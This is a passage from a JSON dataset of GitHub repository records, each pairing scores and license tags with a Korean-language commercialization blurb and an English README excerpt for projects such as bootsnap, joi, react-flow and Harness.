one machine;\n- One of our smaller internal apps also sees a reduction of 50%, from 3.6 to 1.8 seconds;\n- The core Shopify platform -- a rather large monolithic application -- boots about 75% faster,\n  dropping from around 25s to 6.5s.\n* In Shopify core (a large app), about 25% of this gain can be attributed to `compile_cache_*`\n  features; 75% to path caching. This is fairly representative.\n\n## Usage\n\nThis gem works on macOS and Linux.\n\nAdd `bootsnap` to your `Gemfile`:\n\n```ruby\ngem 'bootsnap', require: false\n```\n\nIf you ","composite_score":0.2104,"license_safety_tag":"safe"},{"name":"bytedance/scene","github_url":"https://github.com/bytedance/scene","stars":16,"language":"Java","license":"Apache-2.0","abandonment_months":0,"description":"","readme_excerpt":"<div align=\"center\">\n    <h1>Scene Framework</h1>\n    <p>Android Single Activity Framework compatible with Fragment.</p>\n    <br/>\n</div>\n\n\n[![GitHub license](https://img.shields.io/github/license/bytedance/scene)](https://github.com/bytedance/scene/blob/master/LICENSE)\n[![](https://jitpack.io/v/bytedance/scene.svg)](https://jitpack.io/#bytedance/scene)\n[![API](https://img.shields.io/badge/api-21%2B-green)](https://developer.android.com/about/dashboards)\n\n**Scene** is a lightweight library of navigation and UI composition based on view.\n\n- ✅ Fully compatible with the Jetpack Fragment framework\n- ✅ Simple navigation stack management, with support for multiple navigation stacks\n- ✅ Enhanced lifecycle management and event distribution\n- ✅ Simplifies complex cross-page and shared element animations\n- ✅ Supports modification and automatic restoration of Activity and Window properties\n- ✅ Enables data exchange between Scenes, including permission requests and grants within a Scene\n- ✅ Suppor","composite_score":0.2103,"license_safety_tag":"safe"},{"name":"timqian/chart.xkcd","github_url":"https://github.com/timqian/chart.xkcd","stars":7,"language":"JavaScript","license":"MIT","abandonment_months":0,"description":"# chart.xkcd 분석 보고서\n\n## 왜 보물인가\nXKCD 만화책처럼 손으로 그린 듯한 스타일의 차트를 누구나 쉽게 만들 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 데이터 분석 플랫폼에서 사용자가 친근하고 재미있는 형태의 그래프를 자동으로 생성하도록 통합\n2. **내부 업무 도구**: 기업 보고서나 프레젠테이션에 ","readme_excerpt":"[![](https://raw.githubusercontent.com/timqian/images/master/20190819131226.gif)](https://timqian.com/chart.xkcd/)\n\n> [Who is using chart.xkcd?](https://github.com/timqian/chart.xkcd/issues/14)\n\n## About\n\nChart.xkcd is a chart library that plots “sketchy”, “cartoony” or “hand-drawn” styled charts.\n\nCheck out the [documentation](https://timqian.com/chart.xkcd/) for more instructions and links, or try out the [examples](https://timqian.com/chart.xkcd/example.html), or chat with us in [Slack](https://join.slack.com/t/t9tio/shared_invite/enQtNjgzMzkwMDM0NTE3LTE5ZTUzYjU4Y2I0YzRiZjNkYTkzMzE1ZmM0NDdmYzRlZmMxNGY1MzZlN2EwYjYyNWVlMWY0Nzk2MDBhNWZlY2I)\n\n## Sponsors\n\n[琚致远](https://github.com/juzhiyuan) | [Bytebase](https://bytebase.com/) | [Madao](https://madao.me/) | [SecondState](https://bit.ly/3gfWwps)\n\n[Become a sponsor](https://github.com/sponsors/timqian)\n\n## Quick start\n\nIt’s easy to get started with chart.xkcd. All that’s required is the script included in your page along with a single `<sv","composite_score":0.2103,"license_safety_tag":"safe"},{"name":"jaredrummler/Cyanea","github_url":"https://github.com/jaredrummler/Cyanea","stars":41,"language":"Kotlin","license":"Apache-2.0","abandonment_months":1,"description":"# Cyanea 프로젝트 분석\n\n## 왜 보물인가\n안드로이드 앱의 디자인을 빠르게 예쁘게 만들어주는 도구로, 앱 개발자들이 시간을 절약하고 더 전문적인 결과물을 만들 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 소규모 개발팀을 위한 \"드래그앤드롭 앱 디자이너\" 웹 서비스로 월정액 운영\n2. **내부 업무 도구**: 대형 앱 ","readme_excerpt":"# Cyanea\n\n![](https://raw.githubusercontent.com/jaredrummler/github/main/assets/banners/no-longer-maintained.png)\n\n<img src=\"https://i.imgur.com/eC6d5WO.gif\" align=\"left\" hspace=\"10\" vspace=\"10\"></a>\n\n**A theme engine for Android.**\n<br>\n<sub>Themes are immutable, possibilities are beautiful.</sub>\n\n<a target=\"_blank\" href=\"LICENSE\"><img src=\"http://img.shields.io/:license-apache-blue.svg\" alt=\"License\" /></a>\n<a target=\"_blank\" href=\"https://travis-ci.org/jaredrummler/Cyanea\"><img src=\"https://travis-ci.org/jaredrummler/Cyanea.svg?branch=master\" alt=\"Build Status\" /></a>\n<a target=\"_blank\" href=\"https://maven-badges.herokuapp.com/maven-central/com.jaredrummler/cyanea\"><img src=\"https://maven-badges.herokuapp.com/maven-central/com.jaredrummler/cyanea/badge.svg\" alt=\"Maven Central\" /></a>\n<a target=\"_blank\" href=\"https://developer.android.com/reference/android/os/Build.VERSION_CODES.html#ICE_CREAM_SANDWICH\"><img src=\"https://img.shields.io/badge/API-14%2B-blue.svg?style=flat\" alt=\"API\" ","composite_score":0.21,"license_safety_tag":"safe"},{"name":"sideway/joi","github_url":"https://github.com/sideway/joi","stars":5,"language":"JavaScript","license":"NOASSERTION","abandonment_months":1,"description":"# Joi 저장소 분석 보고서\n\n## 왜 보물인가\n사용자가 입력한 데이터가 안전하고 올바른지 자동으로 검사해주는 검증 도구로, 웹 서비스의 보안을 강화하는 핵심 인프라입니다.\n\n## 어디에 쓸 수 있나\n1. **회원 가입 SaaS 서비스**: 사용자 정보(이메일, 비밀번호, 연락처)가 올바른 형식인지 자동 확인하여 부실 가입 방지\n2. **API 판매 플랫","readme_excerpt":"# joi\n\n#### The most powerful schema description language and data validator for JavaScript.\n\n## Installation\n`npm install joi`\n\n### Visit the [joi.dev](https://joi.dev) Developer Portal for tutorials, documentation, and support\n\n## Useful resources\n\n- [Documentation and API](https://joi.dev/api/)\n- [Versions status](https://joi.dev/resources/status/#joi)\n- [Changelog](https://joi.dev/resources/changelog/)\n- [Project policies](https://joi.dev/policies/)\n","composite_score":0.21,"license_safety_tag":"unknown"},{"name":"fossasia/pslab-firmware","github_url":"https://github.com/fossasia/pslab-firmware","stars":12,"language":"C","license":"Apache-2.0","abandonment_months":1,"description":"# PSLab Firmware 상용화 분석\n\n## 왜 보물인가\n과학 실험실 장비를 직접 만들 수 있는 오픈소스 설계도이기 때문에 교육 기관과 연구자들이 저렴하게 고급 측정 장비를 구축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **내부 업무 도구**: 대학 물리/전자공학과에서 학생 실습용 장비 제작 키트로 판매하여 반복적인 구매 수익 창출\n2. **","readme_excerpt":"# PSLab Firmware\n\nThis repository contains firmware for the\n[Pocket Science Lab (PSLab)](https://pslab.io) open hardware platform.\nHardware version 5 and 6 are supported.\n\n![Build Status](https://github.com/fossasia/pslab-firmware/actions/workflows/main-builder.yml/badge.svg)\n[![Gitter](https://badges.gitter.im/fossasia/pslab.svg)](https://gitter.im/fossasia/pslab?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge)\n[![Mailing List](https://img.shields.io/badge/Mailing%20List-FOSSASIA-blue.svg)](https://groups.google.com/forum/#!forum/pslab-fossasia)\n![Twitter Follow](https://img.shields.io/twitter/follow/pslabio.svg?style=social&label=Follow&maxAge=259)\n\n## Pocket Science Lab\n\nThe PSLab provides an array of test and measurement instruments for doing\nscience and engineering experiments. Its built-in instruments include an\noscilloscope, a waveform generator, a frequency counter, programmable voltage\nand current sources, and a logic analyzer. The PSLab also has UART, I2C, and SPI\nbus","composite_score":0.2099,"license_safety_tag":"safe"},{"name":"viest/php-excel-writer","github_url":"https://github.com/viest/php-excel-writer","stars":6,"language":"C","license":"BSD-2-Clause","abandonment_months":0,"description":"# php-excel-writer 상용화 분석\n\n## 왜 보물인가\n엑셀 파일을 자동으로 만들어주는 프로그램으로, 수많은 데이터를 빠르게 정리해야 하는 회사들이 매년 찾는 필수 도구입니다.\n\n## 어디에 쓸 수 있나\n- **급여 관리 SaaS**: 직원 급여 데이터를 엑셀로 자동 생성하여 회계팀에 제공하는 시스템\n- **마케팅 분석 도구**: 광고 성과 데이","readme_excerpt":"<div align=center>\n<img alt=\"php-ext-xlswriter\" height=\"214\" src=\"resource/logo_now.png\"/>\n</div>\n\n<div align=center>\n<a href=\"https://github.com/viest/php-ext-xlswriter/releases\"><img alt=\"php-ext-xlswriter\" src=\"https://img.shields.io/github/release/viest/php-ext-excel-export.svg\"/></a>\n</div>\n\n<div align=center>\n<a href=\"https://github.com/viest/php-ext-xlswriter\"><img alt=\"php-ext-xlswriter\" src=\"https://img.shields.io/badge/platform-macos%20%7C%20linux%20%7C%20windows-brightgreen.svg\"/></a>\n</div>\n\n<div align=center>\n<a href=\"https://github.com/viest/php-ext-xlswriter/actions\"><img alt=\"php-ext-xlswriter\" src=\"https://img.shields.io/github/actions/workflow/status/viest/php-ext-xlswriter/main.yml?branch=master&logo=github\"></a>\n<a href=\"https://ci.appveyor.com/project/viest/php-ext-xlswriter/branch/master\"><img alt=\"php-ext-xlswriter\" src=\"https://ci.appveyor.com/api/projects/status/w4cfjo9e4gsrs6rn/branch/master?svg=true\"/></a>\n<a href=\"https://app.fossa.io/projects/git%2Bgithub.c","composite_score":0.2096,"license_safety_tag":"safe"},{"name":"MilaNLProc/contextualized-topic-models","github_url":"https://github.com/MilaNLProc/contextualized-topic-models","stars":5,"language":"Python","license":"MIT","abandonment_months":10,"description":"# MilaNLProc/contextualized-topic-models 분석\n\n## 왜 보물인가\n긴 텍스트에서 주요 주제를 자동으로 찾아내는 기술로, 뉴스 분류, 고객 의견 분석, 문서 정리 등 다양한 비즈니스 문제를 해결할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: AI 기반 콘텐츠 분석 플랫폼**\n- 블로그, SNS, 뉴스에","readme_excerpt":"===========================\nContextualized Topic Models\n===========================\n\n.. image:: https://img.shields.io/pypi/v/contextualized_topic_models.svg\n        :target: https://pypi.python.org/pypi/contextualized_topic_models\n\n.. image:: https://github.com/MilaNLProc/contextualized-topic-models/workflows/Python%20package/badge.svg\n        :target: https://github.com/MilaNLProc/contextualized-topic-models/actions\n\n.. image:: https://readthedocs.org/projects/contextualized-topic-models/badge/?version=latest\n        :target: https://contextualized-topic-models.readthedocs.io/en/latest/?badge=latest\n        :alt: Documentation Status\n\n.. image:: https://img.shields.io/github/contributors/MilaNLProc/contextualized-topic-models\n        :target: https://github.com/MilaNLProc/contextualized-topic-models/graphs/contributors/\n        :alt: Contributors\n\n.. image:: https://img.shields.io/badge/License-MIT-blue.svg\n        :target: https://lbesson.mit-license.org/\n        :alt: License\n\n.. i","composite_score":0.2096,"license_safety_tag":"safe"},{"name":"symfony/polyfill-ctype","github_url":"https://github.com/symfony/polyfill-ctype","stars":8,"language":"PHP","license":"MIT","abandonment_months":1,"description":"# symfony/polyfill-ctype 분석 보고서\n\n## 왜 보물인가\n오래된 시스템에서도 최신 프로그램들이 제대로 작동하도록 해주는 '호환성 패치' 역할을 하는 필수 인프라 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 다양한 고객사의 구형 서버 환경에서도 안정적으로 작동하는 웹 애플리케이션 제공\n2. **내부 업무 도구**:","readme_excerpt":"Symfony Polyfill / Ctype\n========================\n\nThis component provides `ctype_*` functions to users who run php versions without the ctype extension.\n\nMore information can be found in the\n[main Polyfill README](https://github.com/symfony/polyfill/blob/main/README.md).\n\nLicense\n=======\n\nThis library is released under the [MIT license](LICENSE).\n","composite_score":0.2094,"license_safety_tag":"safe"},{"name":"sindresorhus/emittery","github_url":"https://github.com/sindresorhus/emittery","stars":6,"language":"JavaScript","license":"MIT","abandonment_months":1,"description":"# Emittery 저장소 분석\n\n## 왜 보물인가\n프로그램 내에서 서로 다른 부분들이 소통할 수 있게 해주는 기초 기술로, 많은 소프트웨어 회사들이 반복적으로 만드는 핵심 기능입니다.\n\n## 어디에 쓸 수 있나\n- **실시간 알림 SaaS**: 사용자의 행동(구매, 댓글 등)에 따라 즉시 알림을 보내는 서비스에 활용\n- **내부 업무 자동화 도구**: 팀","readme_excerpt":"# <img src=\"media/header.png\" width=\"1000\">\n\n> Simple and modern async event emitter\n\n<!-- [![Coverage Status](https://codecov.io/gh/sindresorhus/emittery/branch/main/graph/badge.svg)](https://codecov.io/gh/sindresorhus/emittery) -->\n[![](https://badgen.net/bundlephobia/minzip/emittery)](https://bundlephobia.com/result?p=emittery)\n\nIt works in Node.js and the browser (using a bundler).\n\n**Highlights**\n\n- Async-first — listeners are deferred to the next microtask, keeping your code non-blocking\n- TypeScript support with strongly typed events\n- Async iteration and `for await...of` support\n- [Lifecycle hooks](#initeventname-initfn) (`init`/`deinit`) for lazy resource setup and teardown\n- [`AbortSignal`](https://developer.mozilla.org/en-US/docs/Web/API/AbortSignal) support for cancellation\n- [`Symbol.dispose`](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Symbol/dispose) / [`Symbol.asyncDispose`](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Ref","composite_score":0.2092,"license_safety_tag":"safe"},{"name":"maps4print/azul","github_url":"https://github.com/maps4print/azul","stars":5,"language":"Rust","license":"MIT","abandonment_months":0,"description":"# maps4print/azul 상용화 분석\n\n## 왜 보물인가\n지도를 인쇄용으로 자동으로 예쁘게 만들어주는 도구로, 여행사·부동산·물류업체 등 많은 기업들이 필요로 하는 실용적인 솔루션입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 여행 패키지 제작 플랫폼**\n여행사가 고객별 맞춤 지도를 자동으로 생성하고 인쇄물에 삽입하는 서비스로 월 구","readme_excerpt":"# AZUL - Desktop GUI framework\r\n\r\n<!-- [START badges] -->\r\n[![CI](https://github.com/fschutt/azul/actions/workflows/rust.yml/badge.svg)](https://github.com/fschutt/azul/actions/workflows/rust.yml)\r\n[![Coverage](https://img.shields.io/badge/coverage-report-blue.svg)](https://github.com/fschutt/azul/actions/workflows/rust.yml)\r\n[![LICENSE](https://img.shields.io/badge/license-MIT-blue.svg)](LICENSE)\r\n[![Rust Compiler Version](https://img.shields.io/badge/rustc-1.88%20stable-blue.svg)]()\r\n[![dependency status](https://deps.rs/repo/github/fschutt/azul/status.svg)](https://deps.rs/repo/github/fschutt/azul)\r\n<!-- [END badges] -->\r\n\r\n> Azul is a free, functional, reactive GUI framework for Rust, C and C++,\r\nbuilt using the WebRender rendering engine and a CSS / HTML-like document\r\nobject model for rapid development of beautiful, native desktop applications\r\n\r\n###### [Website](https://azul.rs/) | [Releases](https://azul.rs/releases) | [User guide](https://azul.rs/guide) | [API documentation](h","composite_score":0.2091,"license_safety_tag":"safe"},{"name":"liaisonjs/liaison","github_url":"https://github.com/liaisonjs/liaison","stars":7,"language":"TypeScript","license":"MIT","abandonment_months":1,"description":"# Liaison 저장소 분석\n\n## 왜 보물인가\n서로 다른 시스템들을 마치 대화하듯 자동으로 연결해주는 기술로, 회사들이 수동으로 데이터를 옮기는 번거로운 작업을 없앨 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 중소기업의 회계 소프트웨어와 은행 시스템을 자동 연동하여 매달 수백 건의 거래 기록을 수작업 없이 처리\n- **내부 업","readme_excerpt":"<p align=\"center\">\n\t<img src=\"assets/layr-logo-with-icon.svg\" width=\"200\" alt=\"Layr\">\n\t<br>\n\t<br>\n</p>\n\n> Dramatically simplify full‑stack development.\n\n## Documentation\n\nCheck out the [documentation](https://layrjs.com/docs) for a quick introduction and a comprehensive API description.\n\n## Roadmap\n\n### Components\n\n- [x] Basic components\n- [x] Controlled attributes\n- [x] Component provision\n- [x] Cross-layer inheritance\n- [x] Remote method invocation\n- [x] Optimized serialization\n- [ ] Weak Identity Map\n- [ ] Component subscriptions (realtime updates)\n- [ ] HTTP Caching\n\n### Storage\n\n- [x] Basic storage (MongoDB)\n- [x] Indexes\n  - [x] Identifier attributes\n  - [x] Regular attributes\n  - [x] Compound attributes\n  - [x] Referenced components\n  - [x] Embedded components\n- [ ] Automatic migrations\n  - [x] Indexes\n  - [ ] Default values\n  - [ ] Renamed components\n  - [ ] Renamed attributes\n- [ ] Custom migrations\n- [ ] Polymorphism\n- [ ] Transactions\n- [ ] Sugar to query reverse relationshi","composite_score":0.209,"license_safety_tag":"safe"},{"name":"symfony/translation","github_url":"https://github.com/symfony/translation","stars":9,"language":"PHP","license":"MIT","abandonment_months":1,"description":"# Symfony Translation 저장소 분석\n\n## 왜 보물인가\n여러 언어로 웹사이트나 앱을 운영할 때 각 언어별 문구를 자동으로 관리해주는 핵심 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **다국어 SaaS 서비스**: 한국, 일본, 미국 등 여러 나라 사용자를 위해 자동으로 언어를 전환해주는 구독형 서비스\n2. **기업 내부 업무 도구**: 글","readme_excerpt":"Translation Component\n=====================\n\nThe Translation component provides tools to internationalize your application.\n\nGetting Started\n---------------\n\n```bash\ncomposer require symfony/translation\n```\n\n```php\nuse Symfony\\Component\\Translation\\Translator;\nuse Symfony\\Component\\Translation\\Loader\\ArrayLoader;\n\n$translator = new Translator('fr_FR');\n$translator->addLoader('array', new ArrayLoader());\n$translator->addResource('array', [\n    'Hello World!' => 'Bonjour !',\n], 'fr_FR');\n\necho $translator->trans('Hello World!'); // outputs « Bonjour ! »\n```\n\nSponsor\n-------\n\nHelp Symfony by [sponsoring][3] its development!\n\nResources\n---------\n\n * [Documentation](https://symfony.com/doc/current/translation.html)\n * [Contributing](https://symfony.com/doc/current/contributing/index.html)\n * [Report issues](https://github.com/symfony/symfony/issues) and\n   [send Pull Requests](https://github.com/symfony/symfony/pulls)\n   in the [main Symfony repository](https://github.com/symfony/symfony)\n\n","composite_score":0.2087,"license_safety_tag":"safe"},{"name":"tensorflow/examples","github_url":"https://github.com/tensorflow/examples","stars":7,"language":"Jupyter Notebook","license":"apache-2.0","abandonment_months":1,"description":"# TensorFlow Examples 평가 분석\n\n## 왜 보물인가\n인공지능을 배우고 싶은 사람들을 위해 Google이 직접 준비한 실무 중심의 학습 자료 모음입니다.\n\n## 어디에 쓸 수 있나\n- **AI 교육 플랫폼**: 온라인 강좌나 부트캠프에서 학생들에게 실제 코드 예제 제공\n- **기업 내부 AI 교육**: 회사 직원들의 인공지능 기술 이해도 향","readme_excerpt":"# TensorFlow Examples\n\n<div align=\"center\">\n  <img src=\"https://www.tensorflow.org/images/tf_logo_social.png\" /><br /><br />\n</div>\n\n<h2>Most important links!</h2>\n\n* [Community examples](./community)\n* [Course materials](./courses/udacity_deep_learning) for the [Deep Learning](https://www.udacity.com/course/deep-learning--ud730) class on Udacity\n\nIf you are looking to learn TensorFlow, don't miss the\n[core TensorFlow documentation](http://github.com/tensorflow/docs)\nwhich is largely runnable code.\nThose notebooks can be opened in Colab from\n[tensorflow.org](https://tensorflow.org).\n\n<h2>What is this repo?</h2>\n\nThis is the TensorFlow example repo.  It has several classes of material:\n\n* Showcase examples and documentation for our fantastic [TensorFlow Community](https://tensorflow.org/community)\n* Provide examples mentioned on TensorFlow.org\n* Publish material supporting official TensorFlow courses\n* Publish supporting material for the [TensorFlow Blog](https://blog.tensorflow.org) an","composite_score":0.2082,"license_safety_tag":"safe"},{"name":"teddysun/shadowsocks_install","github_url":"https://github.com/teddysun/shadowsocks_install","stars":5,"language":"Shell","license":"unknown","abandonment_months":3,"description":"# shadowsocks_install 저장소 분석\n\n## 왜 보물인가\n인터넷 접속을 우회할 수 있는 기술을 자동으로 설치해주는 도구로, 인터넷 자유가 제한된 지역에서 수요가 있습니다.\n\n## 어디에 쓸 수 있나\n1. **VPN/프록시 서비스**: 개인용 인터넷 우회 서비스로 월 구독 SaaS 플랫폼\n2. **기업 내부 네트워크 도구**: 해외 출장자나 원","readme_excerpt":"![Shadowsocks](https://github.com/teddysun/shadowsocks_install/raw/master/shadowsocks.png)\n# Auto install Shadowsocks Server\n\nshadowsocks.sh\n===============\n- Auto Install Shadowsocks(Python) Server for CentOS/Debian/Ubuntu\n- https://teddysun.com/342.html\n\nshadowsocks-libev.sh\n===============\n- Auto Install Shadowsocks(libev) Server for CentOS\n- https://teddysun.com/357.html\n\nshadowsocks-libev-debian.sh\n===============\n- Auto Install Shadowsocks(libev) Server for Debian/Ubuntu\n- https://teddysun.com/358.html\n\nshadowsocks-go.sh\n===============\n- Auto Install Shadowsocks(Go) Server for CentOS/Debian/Ubuntu\n- https://teddysun.com/392.html\n\nshadowsocks-crond.sh\n===============\n- Check Shadowsocks(All version) Server is running or not, and start it if not running\n- https://teddysun.com/525.html\n\nshadowsocksR.sh\n===============\n- Auto Install ShadowsocksR Server for CentOS/Debian/Ubuntu\n- https://shadowsocks.be/9.html\n\nshadowsocks-all.sh\n==================\n- Auto Install Shadowsocks Server (","composite_score":0.2082,"license_safety_tag":"unknown"},{"name":"guess-js/guess","github_url":"https://github.com/guess-js/guess","stars":6,"language":"TypeScript","license":"MIT","abandonment_months":0,"description":"# Guess.js 프로젝트 분석\n\n## 왜 보물인가\n웹사이트 방문자들이 다음에 어떤 페이지를 볼지 미리 예측해서 자동으로 준비하는 기술로, 사용자 경험을 크게 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 전자상거래 플랫폼의 페이지 로딩 최적화**\n온라인 쇠핑몰에서 고객이 상품 목록을 보고 있으면, 다음에 클릭할 상세정보 페이지를 미리 로드","readme_excerpt":"[![Build Status](https://travis-ci.com/guess-js/guess.svg?branch=master)](https://travis-ci.com/guess-js/guess)\n\n# Guess.js (alpha)\n\nLibraries and tools for enabling data-driven user-experiences on the web.\n\n## Quickstart\n\n***For Webpack users:***\n### :black_circle: Data-driven bundling\n\nInstall and configure [GuessPlugin](https://github.com/guess-js/guess/tree/master/packages/guess-webpack) - the Guess.js webpack plugin which automates as much of the setup process for you as possible. \n\nShould you wish to try out the modules we offer individually, the `packages` directory contains three packages:\n\n* [`ga`](https://github.com/guess-js/guess/tree/master/packages/guess-ga) - a module for fetching structured data from the Google Analytics API to learn about user navigation patterns. \n* [`parser`](https://github.com/guess-js/guess/tree/master/packages/guess-parser) - a module providing JavaScript framework parsing. This powers the route-parsing capabilities implemented in the Guess webpack","composite_score":0.2081,"license_safety_tag":"safe"},{"name":"JadeMin/aterbot","github_url":"https://github.com/JadeMin/aterbot","stars":282,"language":"TypeScript","license":"GPL-3.0","abandonment_months":3,"description":"","readme_excerpt":"","composite_score":0.208,"license_safety_tag":"restricted"},{"name":"kentcdodds/match-sorter","github_url":"https://github.com/kentcdodds/match-sorter","stars":8,"language":"TypeScript","license":"MIT","abandonment_months":0,"description":"# match-sorter 분석 보고서\n\n## 왜 보물인가\n사용자가 검색할 때 가장 관련 있는 결과를 똑똑하게 정렬해주는 기술로, 전자상거래·검색 서비스·데이터 관리 도구 등 거의 모든 디지털 서비스에 필수적입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 전자상거래 플랫폼 (SaaS)**\n- 고객이 상품을 검색할 때 가장 적합한 물품을 먼저 보여주는 추천 엔","readme_excerpt":"<div align=\"center\">\n<h1>match-sorter</h1>\n\n<p>Simple, expected, and deterministic best-match sorting of an array in JavaScript</p>\n</div>\n\n---\n\n**[Demo](https://codesandbox.io/s/wyk856yo48)**\n\n<!-- prettier-ignore-start -->\n[![Build Status][build-badge]][build]\n[![Code Coverage][coverage-badge]][coverage]\n[![version][version-badge]][package]\n[![downloads][downloads-badge]][npmtrends]\n[![MIT License][license-badge]][license]\n[![All Contributors][all-contributors-badge]](#contributors-)\n[![PRs Welcome][prs-badge]][prs]\n[![Code of Conduct][coc-badge]][coc]\n[![Examples][examples-badge]][examples]\n<!-- prettier-ignore-end -->\n\n## The problem\n\n1.  You have a list of dozens, hundreds, or thousands of items\n2.  You want to filter and sort those items intelligently (maybe you have a\n    filter input for the user)\n3.  You want simple, expected, and deterministic sorting of the items (no fancy\n    math algorithm that fancily changes the sorting as they type)\n\n## This solution\n\nThis follows a sim","composite_score":0.208,"license_safety_tag":"safe"},{"name":"wbkd/react-flow","github_url":"https://github.com/wbkd/react-flow","stars":10,"language":"TypeScript","license":"MIT","abandonment_months":0,"description":"# react-flow 상용화 분석 보고서\n\n## 왜 보물인가\n복잡한 업무 흐름을 마우스로 드래그해서 그릴 수 있는 프로그램으로, 기술 지식 없이도 누구나 자동화 시스템을 만들 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n\n1. **업무 자동화 SaaS**: 마케팅팀이 고객 추적 흐름을, HR팀이 채용 프로세스를 드래그-드롭으로 설계하는 No-code 플","readme_excerpt":"![xyflow-header](https://user-images.githubusercontent.com/2857535/279643999-ffda9f91-6b6d-447d-82be-fcbd6103edb6.svg#gh-light-mode-only)\n![xyflow-header-dark](https://user-images.githubusercontent.com/2857535/279644026-a01c231c-6c6e-4b41-96e0-a85c75c9acee.svg#gh-dark-mode-only)\n\n<div align=\"center\">\n\n![GitHub License MIT](https://img.shields.io/github/license/wbkd/react-flow?color=%23ff0072)\n![npm downloads](https://img.shields.io/npm/dt/reactflow?color=%23FF0072&label=React%20Flow%20downloads)\n![npm downloads](https://img.shields.io/npm/dt/@xyflow/svelte?color=%23FF3E00&label=Svelte%20Flow%20downloads)\n\nPowerful open source libraries for building node-based UIs with React or Svelte. Ready out-of-the-box and infinitely customizable.\n\n[React Flow](https://reactflow.dev/) · [Svelte Flow](https://svelteflow.dev/) · [React Flow Pro](https://reactflow.dev/pro) · [Discord](https://discord.gg/Bqt6xrs)\n</div>\n\n---\n\n## The xyflow mono repo\n\nThe xyflow repository is the home of four packages:\n*","composite_score":0.2078,"license_safety_tag":"safe"},{"name":"nolimits4web/Swiper","github_url":"https://github.com/nolimits4web/Swiper","stars":9,"language":"JavaScript","license":"mit","abandonment_months":1,"description":"# Swiper 저장소 분석\n\n## 왜 보물인가\n웹사이트나 앱에서 손가락으로 밀어서 넘기는 카드 기능을 쉽게 만들 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 부동산 중개 플랫폼이 매물을 카드로 넘기게 하는 인터페이스 제공\n2. **내부 업무 도구**: 회사 직원들이 지원자 이력서를 카드처럼 넘겨가며 검토하는 시스템\n3. ","readme_excerpt":"<p align=\"center\">\n  <img src=\"https://swiperjs.com/images/share-banner.jpg\"/>\n</p>\n\n<p align=\"center\">\n  <a href=\"https://swiperjs.com/get-started\">Get Started</a> |\n  <a href=\"https://swiperjs.com/swiper-api\">Documentation</a> |\n  <a href=\"https://swiperjs.com/demos\">Demos</a>\n</p>\n\n<p align=\"center\">\n\n  <a href=\"https://github.com/nolimits4web/swiper/actions?query=workflow%3ABuild\">\n    <img src=\"https://github.com/nolimits4web/swiper/workflows/Build/badge.svg\" alt=\"Build status\"/>\n  </a>\n  <a href=\"https://www.jsdelivr.com/package/npm/swiper\">\n    <img src=\"https://data.jsdelivr.com/v1/package/npm/swiper/badge?style=rounded\" alt=\"jsDelivr Hits\"/>\n  </a>\n  <a href=\"https://bundlephobia.com/result?p=swiper\">\n    <img alt=\"tree-shakeable\" src=\"https://badgen.net/bundlephobia/tree-shaking/swiper\" />\n  </a>\n  <a href=\"https://npmjs.org/package/swiper\">\n    <img alt=\"types included\" src=\"https://badgen.net/npm/types/swiper\" />\n  </a>\n</p>\n\n# Swiper\n\nSwiper - is the free and most modern m","composite_score":0.2078,"license_safety_tag":"safe"},{"name":"drone/drone","github_url":"https://github.com/drone/drone","stars":7,"language":"Go","license":"Apache-2.0","abandonment_months":0,"description":"# drone/drone 저장소 분석\n\n## 왜 보물인가\n소프트웨어 개발팀이 코드 변경을 자동으로 검사하고 배포하는 반복적인 작업을 대폭 줄일 수 있는 오픈소스 자동화 플랫폼입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 개발팀을 위한 클라우드 기반 자동 테스트·배포 대행 서비스\n- **내부 업무 도구**: 대규모 IT조직의 소프트웨어 개발","readme_excerpt":"# Harness\nHarness Open Source is an open source development platform packed with the power of code hosting, automated DevOps pipelines, hosted development environments (Gitspaces), and artifact registries.\n\n## Overview\nHarness Open source is an open source development platform packed with the power of code hosting, automated DevOps pipelines, Gitspaces, and artifact registries.\n\n\n## Running Harness locally\n> The latest publicly released docker image can be found on [harness/harness](https://hub.docker.com/r/harness/harness).\n\nTo install Harness yourself, simply run the command below. Once the container is up, you can visit http://localhost:3000 in your browser.\n\n```bash\ndocker run -d \\\n  -p 3000:3000 \\\n  -p 3022:3022 \\\n  -v /var/run/docker.sock:/var/run/docker.sock \\\n  -v /tmp/harness:/data \\\n  --name harness \\\n  --restart always \\\n  harness/harness\n```\n> The Harness image uses a volume to store the database and repositories. It is highly recommended to use a bind mount or named volume","composite_score":0.2074,"license_safety_tag":"safe"},{"name":"spekt8/spekt8","github_url":"https://github.com/spekt8/spekt8","stars":14,"language":"JavaScript","license":"MIT","abandonment_months":0,"description":"# spekt8 저장소 분석\n\n## 왜 보물인가\n쿠버네티스(클라우드 서버 관리 기술)의 동작을 시각적으로 보여주는 도구로, 복잡한 기술을 눈으로 이해할 수 있게 만들어 줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 인프라 모니터링 웹 서비스로 기업 고객에게 월 구독료 받기\n2. **내부 업무 도구**: 대규모 IT회사의 DevO","readme_excerpt":"# SPEKT<img width=\"30\" alt=\"portfolio_view\" src=\"https://github.com/spekt8/spekt8/blob/master/dist/images/src/client/images/spekt8-logo-ecbc06d5.png\">\n\nSPEKT8 is a new visualization tool for your Kubernetes clusters. It automatically builds logical topologies of your application and infrastructure, which enable your SRE and Ops team to intuitively understand, monitor, and control your containerized, microservices based application. Simply deploy our containerized application directly into your Kubernetes cluster. \n\n<img src=\"https://github.com/spekt8/spekt8/blob/master/spekt8-preview.gif\" width=\"600\" height=\"300\" />\n\nWhen your app 